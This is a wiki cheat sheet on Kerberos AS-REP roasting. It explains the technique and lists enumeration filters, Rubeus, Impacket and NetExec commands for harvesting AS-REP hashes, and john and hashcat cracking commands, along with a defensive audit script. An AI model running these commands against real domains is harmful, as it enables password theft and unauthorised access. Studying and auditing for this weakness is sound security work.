ASREP Roasting - CraigDonkin/Infrastructure GitHub Wiki

  • Can be performed against users that have Kerberos pre-authentication disabled.
  • You send an AS_REQ to the KDC on behalf of one of these users and receive an AS_REP, which the KDC returns without requiring any proof of the user's key.
    • Part of the AS_REP is encrypted with the user's key, so the password can then be recovered in an offline cracking attack.
  • You don't need a domain user account, just network access to talk to the KDC/DC.
    • But you do need a domain user account to enumerate which accounts are vulnerable. Otherwise you are restricted to brute-forcing usernames.

Enumeration

  • PowerView:
Get-DomainUser -PreauthNotRequired -verbose
  • LDAP:
(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
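The LDAP filter above is a bitwise-AND test on userAccountControl for bit 4194304 (DONT_REQ_PREAUTH). The following audit script is an added example (not part of this wiki) that applies the same test to an exported list of user records and also separates enabled from disabled accounts, since only enabled accounts can actually be roasted; the user records are constructed sample data.

```python
# Added audit example: flag accounts whose userAccountControl has the
# DONT_REQ_PREAUTH bit set, i.e. the same condition the LDAP filter
# (userAccountControl:1.2.840.113556.1.4.803:=4194304) expresses.
# The sample records are constructed, not taken from a real domain.

DONT_REQ_PREAUTH = 0x400000   # 4194304, the bit the LDAP filter tests
ACCOUNTDISABLE = 0x0002       # a disabled account cannot be roasted

# Constructed export, e.g. from Get-ADUser -Properties userAccountControl
SAMPLE_USERS = [
    {"sAMAccountName": "alice",      "userAccountControl": 512},      # normal account
    {"sAMAccountName": "svc_legacy", "userAccountControl": 4194816},  # 512 | 4194304
    {"sAMAccountName": "old_svc",    "userAccountControl": 4194818},  # 512 | 4194304 | 2
    {"sAMAccountName": "bob",        "userAccountControl": 66048},    # 512 | 65536
]


def preauth_not_required(uac: int) -> bool:
    """Same bitwise test as the LDAP_MATCHING_RULE_BIT_AND filter."""
    return bool(uac & DONT_REQ_PREAUTH)


def is_enabled(uac: int) -> bool:
    return not (uac & ACCOUNTDISABLE)


def audit(users):
    """Return accounts that are roastable right now (pre-auth off AND enabled)
    and, separately, disabled accounts that still have pre-auth off so they
    can be fixed before anyone re-enables them."""
    roastable, disabled = [], []
    for u in users:
        uac = int(u["userAccountControl"])
        if not preauth_not_required(uac):
            continue
        (roastable if is_enabled(uac) else disabled).append(u["sAMAccountName"])
    return {"roastable": roastable, "disabled_with_preauth_off": disabled}


if __name__ == "__main__":
    result = audit(SAMPLE_USERS)
    for name in result["roastable"]:
        print(f"[!] {name}: pre-auth disabled; clear DONT_REQ_PREAUTH and rotate the password")
    for name in result["disabled_with_preauth_off"]:
        print(f"[i] {name}: disabled, but pre-auth is off; fix before re-enabling")
```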

Requesting AS_REP

Rubeus

Rubeus.exe asreproast /user:<username> /nowrap
Rubeus.exe asreproast /format:hashcat /outfile:<outputfile> /user:<username>

Impacket

GetNPUsers.py -request -format hashcat -outputfile <output file> -dc-ip <KDC IP> '<DOMAIN>/<username>'

NetExec

nxc ldap <IP> -u <username> -p <password> --asreproast <output> --kdcHost <domain name>

Cracking

john --format=krb5asrep --wordlist=<wordlist> <hashes>
hashcat -m 18200 --force -a 0 <hashes> <wordlist>